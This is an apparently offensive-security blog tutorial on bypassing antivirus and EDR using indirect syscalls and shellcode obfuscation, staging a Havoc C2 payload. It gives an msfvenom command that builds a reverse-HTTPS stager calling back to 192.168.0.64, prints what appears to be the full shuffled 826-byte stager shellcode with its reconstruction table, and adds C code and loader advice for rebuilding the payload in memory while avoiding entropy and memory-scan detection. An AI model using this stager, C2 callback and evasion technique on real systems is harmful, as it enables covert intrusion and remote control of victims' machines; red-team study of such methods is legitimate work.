zgtangqian.com

Bypassing AV and EDR: Indirect Syscalls and Obfuscation Techniques

In this article, we will explore a method to evade signature detection by antivirus programs through shellcode obfuscation and indirect system calls to the NT API. The obfuscation targets AV solutions that rely primarily on signature matching. The indirect syscalls target EDR hooks and kernel callbacks that judge a system call by the return address of its `syscall` instruction rather than by walking the complete call stack: with a direct syscall the `syscall` instruction sits in the loader's own memory, so the return address points outside any legitimately loaded DLL, whereas an indirect syscall sets up the system service number in the loader and then jumps to the `syscall; ret` sequence inside ntdll.dll, so the return address lands in ntdll exactly as it would for a normal call. An EDR that unwinds the full stack still sees the loader's frame above that ntdll frame, which is the main limitation of the technique.

Generating Shellcode with Msfvenom

The Havoc C2 shellcode is quite large, so rather than embedding it directly we will generate a small msfvenom stager that retrieves the Havoc C2 shellcode over HTTPS as a second-stage payload. The `windows/x64/custom/reverse_https` payload is the reverse-HTTPS stager variant that serves a stage you supply yourself (here the Havoc shellcode) instead of a Metasploit stage. We'll refer to this stager shellcode as msf.bin.

msfvenom -p windows/x64/custom/reverse_https LHOST=192.168.0.64 LPORT=8443 EXITFUNC=thread -f raw HttpUserAgent='Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' LURI=blog.html HandlerSSLCert=/home/atler/Downloads/www.google.com.pem -o msf.bin

For more details on creating a HandlerSSLCert, please refer to my previous post.

Generating Shellcode with Havoc C2

Refer to my earlier post on setting up the listener and creating the shellcode payload. We will use nearly all the same options for the payload, but we won't enable Havoc's own indirect-syscall option, since our loader PE will handle that. This shellcode will be called Havoc.bin.

Obfuscating Msfvenom Shellcode

Jigsaw is a tool that takes raw shellcode and produces a shuffled copy of it, along with a lookup table of the original byte positions and a C/C++ stub that reconstructs the original shellcode at runtime. Because shuffling only reorders bytes, the byte histogram, and therefore the Shannon entropy, of the stored array is identical to that of the raw shellcode; encrypting or packing the payload instead would push the entropy towards 8 bits per byte, which some EDR/AV products flag on its own. The cost is the lookup table: it is one `int` per shellcode byte, so the pair of arrays occupies roughly five times the size of the raw payload, which is still far smaller than schemes that replace every byte with a word or sentence.

You can find Jigsaw on GitHub: GitHub - RedSiege/Jigsaw: Hide shellcode by shuffling bytes into a random array and reconstruct at runtime.

The developer notes that “at some point, the deobfuscated shellcode will exist in memory and could be detected there. The methods used to load and execute the shellcode also present opportunities for detection.” EDR solutions generally have an edge over AV solutions here because they emphasise behavioural analysis and memory scanning rather than the file on disk. Download jigsaw.py from the repository and run it against the msfvenom shellcode to produce jigsaw.txt.

python3 jigsaw.py msf.bin

The output in jigsaw.txt is the shuffled byte array and the positions table that the reconstruction stub indexes; copy them into the loader project in Visual Studio:

unsigned char jigsaw[826] = { 0x36, 0x56, 0x58, 0x83, 0x18, 0x37, 0x89, 0x96, 0x00, 0x6a, 0x07, 0x77, 0x5a, 0xe8, 0x02, 0x0b, 0x32, 0x5e, 0x50, 0xc1, 0x48, 0xba, 0xba, 0x54, 0x41, 0x89, 0x65, 0xc1, 0xc7, 0x6b, 0x48, 0xd0, 0x48, 0xff, 0x53, 0x6a, 0x48, 0x00, 0x00, 0xc0, 0x46, 0x75, 0x2e, 0x6c, 0x38, 0x48, 0x47, 0x85, 0x01, 0x83, 0x53, 0x58, 0x48, 0xff, 0x6a, 0x4c, 0x68, 0x66, 0x4d, 0x79, 0x9e, 0xe0, 0x8b, 0x71, 0xc7, 0x00, 0x44, 0x39, 0x44, 0x59, 0xd2, 0x40, 0x67, 0x33, 0xc4, 0x58, 0x00, 0x67, 0x53, 0x5a, 0x51, 0x58, 0x57, 0x44, 0x73, 0x02, 0x8b, 0x34, 0x74, 0x3b, 0x57, 0x56, 0x50, 0x00, 0x47, 0x00, 0x71, 0xff, 0x00, 0x6c, 0x5a, 0x4d, 0xff, 0x53, 0x8b, 0x00, 0x59, 0x74, 0x5a, 0x52, 0x4b, 0xc1, 0x71, 0x75, 0x7a, 0x85, 0x57, 0x00, 0xc1, 0xc0, 0xff, 0x66, 0x48, 0x7a, 0x00, 0x4b, 0x62, 0x0f, 0x00, 0xff, 0x58, 0x30, 0x41, 0x6e, 0x00, 0x57, 0x12, 0x67, 0x41, 0x49, 0xbe, 0x6a, 0x03, 0xc9, 0x56, 0x90, 0x04, 0xd5, 0x74, 0x4d, 0x48, 0x31, 0x48, 0x4b, 0x10, 0x37, 0x4c, 0xe0, 0x4d, 0x61, 0x12, 0x84, 0x6c, 0x48, 0x53, 0x3c, 0xe1, 0x43, 0x57, 0x77, 0x85, 0x8b, 0x52, 0xfc, 0xc0, 0x33, 0xd5, 0x34, 0x6b, 0x00, 0xff, 0x96, 0x31, 0x89, 0x76, 0xff, 0x32, 0x89, 0xd5, 0x41, 0x1f, 0x72, 0x24, 0x0f, 0x59, 0xf1, 0x77, 0x6b, 0x69, 0x53, 0x48, 0x75, 0x48, 0x24, 0x44, 0x00, 0xe2, 0x78, 0xc6, 0x46, 0x02, 0x58, 0x50, 0x53, 0xa7, 0x49, 0x74, 0x50, 0x49, 0x00, 0xc2, 0x8b, 0x8b, 0x4c, 0x4d, 0x6b, 0x46, 0x2d, 0x72, 0x65, 0x52, 0x66, 0x20, 0x52, 0x00, 0x50, 0x88, 0x8b, 0x31, 0x41, 0x56, 0xf9, 0xd5, 0x52, 0xe1, 0xe2, 0xd8, 0x37, 0xd5, 0xed, 0x45, 0x48, 0x26, 0xd5, 0x7a, 0x41, 0x2d, 0x00, 0xff, 0x73, 0x00, 0x78, 0x00, 0x49, 0x00, 0xe4, 0x32, 0x72, 0x04, 0x7a, 0x76, 0x79, 0x49, 0x00, 0x89, 0x69, 0x00, 0x6a, 0x49, 0x75, 0x47, 0xc7, 0xdb, 0x89, 0x00, 0x42, 0x53, 0x53, 0x52, 0x5a, 0x52, 0x31, 0x39, 0x5a, 0xa4, 0x44, 0x80, 0xd5, 0x71, 0xf9, 0x20, 0x48, 0x6a, 0xd5, 0x65, 0x41, 0x33, 0xda, 0x4d, 0x89, 0xc0, 0x9f, 0xff, 0x55, 0x31, 0x6e, 0x00, 0x4a, 0x77, 0x53, 0x5a, 0x34, 0x42, 0x06, 0xc2, 0x68, 0x36, 0xd0, 
0x59, 0x48, 0x31, 0x2d, 0x6c, 0x34, 0xe0, 0x4d, 0x5a, 0xe2, 0x35, 0x01, 0x46, 0x48, 0x4a, 0x13, 0x41, 0x76, 0x65, 0x31, 0x38, 0x34, 0x52, 0x53, 0x71, 0x48, 0x89, 0x00, 0xba, 0xff, 0x55, 0xc7, 0xd3, 0x31, 0x49, 0x2e, 0x80, 0x64, 0x31, 0x88, 0xff, 0x69, 0x00, 0x01, 0xd5, 0x6c, 0x36, 0x35, 0x75, 0xdc, 0x53, 0x48, 0xcf, 0x62, 0x8b, 0x45, 0xaa, 0x41, 0x53, 0x44, 0x6a, 0xc9, 0xeb, 0x39, 0x30, 0x20, 0xf1, 0x4f, 0x00, 0x89, 0x00, 0x40, 0x85, 0x00, 0x71, 0x68, 0x4d, 0xc9, 0x72, 0xc0, 0x41, 0x00, 0x01, 0x0a, 0x42, 0xc1, 0x4b, 0x0d, 0x52, 0xff, 0x00, 0xe3, 0x89, 0xff, 0x34, 0x48, 0x65, 0x31, 0x68, 0x6d, 0x66, 0x78, 0xff, 0x0d, 0x34, 0x53, 0x48, 0x52, 0x18, 0x34, 0x36, 0x65, 0x00, 0x62, 0x49, 0xb7, 0x00, 0xc9, 0x4d, 0xf1, 0xd0, 0x49, 0x50, 0x50, 0x4f, 0x41, 0x78, 0x08, 0xeb, 0x28, 0xc9, 0x59, 0xd5, 0x51, 0x53, 0x56, 0x89, 0xd1, 0x01, 0x41, 0xe8, 0x41, 0x39, 0x2e, 0x31, 0x00, 0xe2, 0x30, 0x8b, 0x64, 0x40, 0x01, 0x00, 0xe0, 0x38, 0x66, 0x48, 0x85, 0x46, 0x2a, 0x8b, 0x49, 0xc9, 0x50, 0x58, 0x2f, 0x8b, 0x0c, 0x48, 0x0d, 0x89, 0x44, 0x44, 0xc7, 0x00, 0x77, 0x48, 0x00, 0x45, 0xe8, 0x74, 0x57, 0xc3, 0x04, 0xff, 0x01, 0x37, 0x20, 0x48, 0x53, 0x58, 0x30, 0xe9, 0x42, 0x00, 0xff, 0x51, 0xff, 0x54, 0xe7, 0x6a, 0x53, 0x34, 0x6a, 0x8b, 0x41, 0x56, 0xba, 0x72, 0x47, 0x42, 0xfb, 0xa8, 0xc2, 0x71, 0x66, 0x59, 0x00, 0x49, 0x5a, 0x89, 0x48, 0xc6, 0x52, 0xc0, 0x48, 0x47, 0x4b, 0xc9, 0x48, 0x50, 0x77, 0x48, 0x4d, 0x2d, 0x54, 0x31, 0xd0, 0xf1, 0x39, 0x51, 0x32, 0x1f, 0xe1, 0x88, 0x00, 0x36, 0x6b, 0x67, 0x48, 0x00, 0x6a, 0x68, 0x00, 0x48, 0x75, 0x41, 0x71, 0x01, 0xda, 0x00, 0x81, 0x2e, 0x31, 0x55, 0x46, 0x77, 0x53, 0x49, 0x35, 0xc9, 0x83, 0x46, 0x56, 0x31, 0x58, 0x53, 0x59, 0x58, 0x73, 0x49, 0x00, 0x73, 0x4a, 0x41, 0x55, 0x47, 0x20, 0x62, 0x69, 0x50, 0x41, 0x58, 0x44, 0xd5, 0x8b, 0x00, 0x3c, 0xba, 0x43, 0xe8, 0x31, 0x41, 0x4d, 0xc0, 0x00, 0x49, 0xac, 0x41, 0x74, 0x72, 0x58, 0x31, 0x48, 0x8b, 0x4a, 0x41, 0xc0, 0x89, 0x67, 0x6c, 0x89, 0x41, 0xc0, 0x36, 0x00, 0xcc, 0x64, 0x18, 0x51, 0x70, 0x48, 0x12, 
0x52, 0x00, 0x53, 0xf1, 0x53, 0x00, 0xd0, 0x61, 0x00, 0xc1, 0x83, 0x5f, 0x64, 0x33, 0x0a, 0x57, 0xb8, 0x53, 0x53, 0x54, 0x72, 0x48, 0x38, 0x53, 0x65, 0xc9, 0xe0, 0x53, 0x00, 0x6a, 0x71, 0x18, 0x00, 0xf0, 0x89, 0x1c, 0x48, 0x89, 0x2f, 0x60, 0x00, 0x54, 0x48, 0x84, 0x49, 0xe5, 0x76, 0x2e, 0x49, 0x41, 0x00, 0xff, 0x48, 0x89, 0x5a, 0x78, 0x38, 0x36, 0x57, 0x50, 0x32, 0xba, 0x01, 0x57, 0x48, 0x6a, 0x6f, 0x45, 0x6d, 0x6d, 0x7c, 0x00, 0x4c, 0x4a, 0x59, 0x7b, 0xd0, 0x37, 0x89, 0x51, 0x50, 0x72, 0x40, 0xec, 0x6b, 0xd6, 0x00, 0x88, 0x49, 0x00, 0x77, 0x77, 0x00, 0x36, 0x48, 0x77, 0x75, 0x4d, 0x93, 0x3a, 0x75, 0xc1, 0x45, 0xff, 0x86, 0x68, 0x5a, 0x78, 0x75, 0x67, 0x48, 0x49, 0x73, 0x52, 0x0f, 0xbb, 0x89, 0x48, 0x33, 0x4a, 0x44, 0x20, 0x89, 0x73, 0xf0, 0x00, 0x55, 0x41, 0x53, 0x20, 0x00, 0x79, 0x6d, 0x54, 0x5a, 0xc7, 0xac, 0x74, 0x4a, 0x49, 0x5f, 0xc0, 0x46, 0x5d, 0x5a, 0x49, 0x00, 0x49, 0x2c, 0x8b, 0xc0, 0x41, 0x74, 0xba, 0x51, 0x31, 0x1d, 0x03, 0xc4, 0x00, 0x2d, 0xc9, 0x00, 0x58, 0x33 };

int positions[826] = { 461, 19, 179, 2, 664, 427, 290, 721, 814, 627, 240, 493, 193, 319, 695, 81, 421, 185, 13, 61, 771, 787, 719, 399, 480, 310, 473, 674, 293, 477, 231, 182, 648, 117, 505, 615, 74, 725, 795, 779, 382, 487, 602, 326, 438, 672, 378, 84, 127, 799, 770, 530, 126, 604, 813, 146, 523, 407, 643, 546, 635, 141, 34, 346, 673, 686, 350, 276, 104, 747, 17, 106, 99, 521, 800, 810, 94, 409, 541, 288, 486, 579, 348, 548, 555, 82, 164, 506, 227, 603, 309, 230, 36, 593, 484, 764, 367, 641, 88, 403, 249, 253, 809, 257, 89, 273, 815, 732, 462, 465, 516, 139, 420, 142, 571, 730, 433, 793, 134, 252, 666, 428, 180, 551, 685, 210, 325, 83, 753, 796, 757, 471, 229, 225, 314, 566, 788, 328, 59, 718, 220, 304, 305, 255, 261, 806, 176, 690, 559, 37, 109, 655, 289, 406, 752, 472, 144, 626, 414, 455, 720, 805, 466, 206, 769, 73, 233, 481, 534, 413, 802, 30, 67, 0, 47, 621, 825, 499, 468, 297, 728, 789, 275, 649, 349, 317, 418, 246, 729, 188, 671, 445, 147, 804, 186, 143, 347, 456, 222, 218, 194, 633, 741, 158, 388, 86, 791, 423, 608, 634, 52, 436, 542, 306, 263, 171, 98, 437, 708, 688, 661, 175, 168, 457, 654, 432, 476, 405, 362, 549, 345, 162, 54, 27, 272, 103, 91, 123, 652, 122, 389, 320, 318, 199, 710, 62, 153, 570, 797, 63, 547, 606, 239, 605, 344, 198, 434, 92, 692, 440, 266, 539, 321, 755, 640, 3, 587, 35, 628, 371, 525, 262, 777, 592, 716, 338, 678, 469, 624, 513, 560, 235, 217, 784, 586, 72, 411, 657, 31, 496, 14, 644, 454, 577, 758, 167, 90, 667, 478, 785, 32, 774, 711, 642, 353, 55, 398, 782, 385, 625, 645, 311, 213, 444, 216, 223, 794, 43, 439, 303, 740, 286, 368, 663, 599, 442, 361, 76, 453, 715, 251, 565, 333, 124, 201, 299, 451, 706, 531, 138, 518, 573, 44, 676, 713, 507, 501, 120, 374, 535, 342, 738, 504, 40, 778, 677, 680, 808, 474, 749, 743, 581, 659, 278, 620, 379, 512, 675, 268, 224, 622, 60, 766, 393, 396, 683, 670, 733, 576, 25, 693, 359, 108, 426, 697, 12, 759, 681, 540, 582, 600, 150, 557, 107, 614, 500, 751, 790, 687, 157, 668, 298, 554, 341, 352, 
118, 85, 750, 163, 754, 172, 610, 401, 56, 483, 58, 618, 211, 93, 114, 574, 212, 419, 704, 446, 380, 511, 567, 450, 561, 824, 271, 377, 243, 612, 449, 110, 495, 280, 226, 87, 364, 502, 42, 763, 653, 580, 717, 102, 159, 337, 528, 558, 190, 79, 148, 696, 737, 656, 739, 269, 448, 646, 115, 775, 151, 112, 174, 698, 629, 410, 284, 16, 274, 723, 544, 66, 532, 745, 101, 591, 684, 503, 77, 45, 96, 383, 819, 22, 631, 301, 394, 714, 324, 207, 165, 584, 136, 742, 458, 475, 598, 702, 238, 1, 322, 149, 270, 331, 366, 811, 712, 807, 181, 460, 801, 780, 583, 812, 283, 209, 569, 8, 765, 11, 241, 360, 773, 563, 372, 373, 609, 105, 183, 384, 632, 422, 543, 489, 295, 588, 236, 340, 376, 204, 265, 783, 617, 709, 29, 312, 392, 803, 65, 514, 424, 39, 21, 459, 550, 129, 250, 662, 524, 300, 113, 650, 336, 402, 556, 616, 247, 177, 228, 429, 537, 527, 15, 762, 744, 330, 637, 245, 400, 821, 517, 75, 823, 792, 78, 329, 46, 601, 526, 479, 244, 748, 355, 135, 195, 529, 533, 130, 154, 256, 630, 189, 491, 258, 726, 497, 568, 578, 416, 339, 197, 343, 564, 594, 10, 184, 351, 242, 156, 315, 49, 259, 417, 5, 279, 178, 119, 97, 572, 679, 132, 746, 488, 395, 202, 254, 215, 26, 435, 137, 669, 772, 375, 441, 822, 203, 294, 285, 7, 6, 415, 80, 18, 412, 95, 208, 64, 639, 707, 776, 596, 313, 161, 50, 590, 291, 735, 611, 447, 536, 820, 522, 585, 248, 658, 408, 470, 100, 281, 302, 20, 57, 817, 595, 727, 390, 467, 28, 316, 682, 607, 170, 116, 722, 334, 24, 287, 363, 33, 589, 292, 760, 509, 282, 234, 133, 700, 200, 734, 705, 187, 482, 140, 404, 485, 397, 277, 756, 160, 335, 691, 430, 327, 520, 332, 699, 51, 323, 237, 552, 191, 665, 173, 386, 613 };
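The shuffle-and-reconstruct scheme described above, as an added example in C that is neither the Jigsaw project's code nor the author's loader. It implements both halves: the tool side (a Fisher-Yates shuffle of the index list that emits a jigsaw[] and positions[] pair) and the loader side (the reconstruction loop), plus two checks a practitioner wants before pasting arrays into a PE: that the positions table really is a permutation, since the stub writes out[positions[i]] and a truncated or edited table becomes an out-of-bounds write inside your own loader, and that the shuffled array's byte histogram, and hence its Shannon entropy, is unchanged. The layout assumed is shellcode[positions[i]] == jigsaw[i], which the arrays above follow: positions[173] is 0 and jigsaw[173] is 0xfc (the `cld` that opens msfvenom x64 shellcode), positions[3] is 2 and jigsaw[3] is 0x83. The SAMPLE bytes, the xorshift PRNG, the seed and the function names are constructed for illustration.

```c
/* Added example, not the Jigsaw project's own code: jigsaw.py's byte shuffle and
 * the reconstruction stub a loader runs, with the table and histogram checks.
 * Convention (verified against the page's arrays): code[positions[i]] == jig[i].
 * Build: cc -O2 -Wall -o jigsaw_demo jigsaw_demo.c
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stand-in for msf.bin: x64-looking filler, not a working payload,
 * with repeated values so the histogram comparison is meaningful. */
static const unsigned char SAMPLE[] = {
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x31, 0xc0, 0x48,
    0x31, 0xd2, 0x48, 0x31, 0xc9, 0x41, 0x50, 0x41, 0x51, 0x48, 0x8b, 0x52,
    0x60, 0x48, 0x8b, 0x52, 0x18, 0x4d, 0x31, 0xc9, 0x65, 0x48, 0x8b, 0x52,
    0x60, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x05, 0x10, 0x00, 0x00, 0x00, 0xc3
};
#define SAMPLE_LEN (sizeof SAMPLE)

/* Small deterministic PRNG so one seed always gives the same layout
 * (jigsaw.py uses Python's random module for this job). State must not be 0. */
static uint32_t xorshift32(uint32_t *s)
{
    uint32_t x = *s;
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    return *s = x;
}

/* Tool side: Fisher-Yates shuffle of the index list 0..n-1, then gather the
 * bytes in that order. Afterwards code[positions[i]] == jig[i] for every i. */
void jigsaw_shuffle(const unsigned char *code, size_t n,
                    unsigned char *jig, int *positions, uint32_t seed)
{
    uint32_t s = seed ? seed : 0x9e3779b9u;
    if (n == 0) return;
    for (size_t i = 0; i < n; i++) positions[i] = (int)i;
    for (size_t i = n - 1; i > 0; i--) {
        size_t j = xorshift32(&s) % (i + 1);
        int t = positions[i]; positions[i] = positions[j]; positions[j] = t;
    }
    for (size_t i = 0; i < n; i++) jig[i] = code[positions[i]];
}

/* positions[] must be a permutation of 0..n-1: every index once, none out of
 * range. Anything else is a silent memory corruption in the loader. */
int positions_valid(const int *positions, size_t n)
{
    unsigned char *seen = calloc(n ? n : 1, 1);
    int ok = seen != NULL;
    for (size_t i = 0; ok && i < n; i++) {
        if (positions[i] < 0 || (size_t)positions[i] >= n || seen[positions[i]])
            ok = 0;
        else
            seen[positions[i]] = 1;
    }
    free(seen);
    return ok;
}

/* Loader side: the same loop as the stub jigsaw.py emits, guarded by the table
 * check. Returns 0 on success, -1 if the table is unusable. */
int jigsaw_reconstruct(const unsigned char *jig, const int *positions,
                       size_t n, unsigned char *out)
{
    if (!positions_valid(positions, n)) return -1;
    for (size_t i = 0; i < n; i++) out[positions[i]] = jig[i];
    return 0;
}

/* Shannon entropy is a function of the byte histogram alone, so equal
 * histograms guarantee equal entropy; this is the "no entropy increase"
 * property as a hard check, without pulling in libm. */
int same_histogram(const unsigned char *a, const unsigned char *b, size_t n)
{
    size_t ha[256] = {0}, hb[256] = {0};
    for (size_t i = 0; i < n; i++) { ha[a[i]]++; hb[b[i]]++; }
    return memcmp(ha, hb, sizeof ha) == 0;
}

/* Full round trip: shuffle, confirm the histogram is unchanged, rebuild, and
 * confirm the bytes match. Returns 1 on success. */
int jigsaw_roundtrip_ok(const unsigned char *code, size_t n, uint32_t seed)
{
    unsigned char *jig = malloc(n), *out = malloc(n);
    int *pos = malloc(n * sizeof *pos);
    int ok = 0;
    if (jig && out && pos && n > 0) {
        jigsaw_shuffle(code, n, jig, pos, seed);
        ok = same_histogram(code, jig, n)
          && jigsaw_reconstruct(jig, pos, n, out) == 0
          && memcmp(out, code, n) == 0;
    }
    free(jig); free(out); free(pos);
    return ok;
}

/* A valid table passes; a duplicated index or an out-of-range one is refused. */
int corrupted_table_rejected(void)
{
    int good[4] = {3, 0, 2, 1};
    int dup[4]  = {0, 2, 2, 3};   /* index 1 missing, index 2 written twice */
    int oob[4]  = {0, 1, 2, 7};   /* 7 would write past a 4-byte buffer */
    return positions_valid(good, 4) && !positions_valid(dup, 4) && !positions_valid(oob, 4);
}

int main(void)
{
    unsigned char jig[SAMPLE_LEN];
    int pos[SAMPLE_LEN];
    jigsaw_shuffle(SAMPLE, SAMPLE_LEN, jig, pos, 0xC0FFEEu);
    printf("unsigned char jigsaw[%zu] = {", SAMPLE_LEN);
    for (size_t i = 0; i < SAMPLE_LEN; i++) printf("%s0x%02x", i ? ", " : " ", jig[i]);
    printf(" };\nint positions[%zu] = {", SAMPLE_LEN);
    for (size_t i = 0; i < SAMPLE_LEN; i++) printf("%s%d", i ? ", " : " ", pos[i]);
    printf(" };\nround trip ok: %d\n", jigsaw_roundtrip_ok(SAMPLE, SAMPLE_LEN, 0xC0FFEEu));
    return 0;
}
```

Two points worth keeping in mind when wiring this into the loader. The jigsaw array has the same entropy as the raw payload, but the positions table is mostly small integers (every value here is below 826, so the upper bytes of each `int` are zero), which pulls the entropy of the whole section down rather than up; that is a property of the scheme, not a problem. And, as the developer's note above warns, the buffer that jigsaw_reconstruct fills is the plaintext stager in memory from that moment on, so it should be reconstructed as late as possible and into memory the loader controls, not left sitting in a global.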
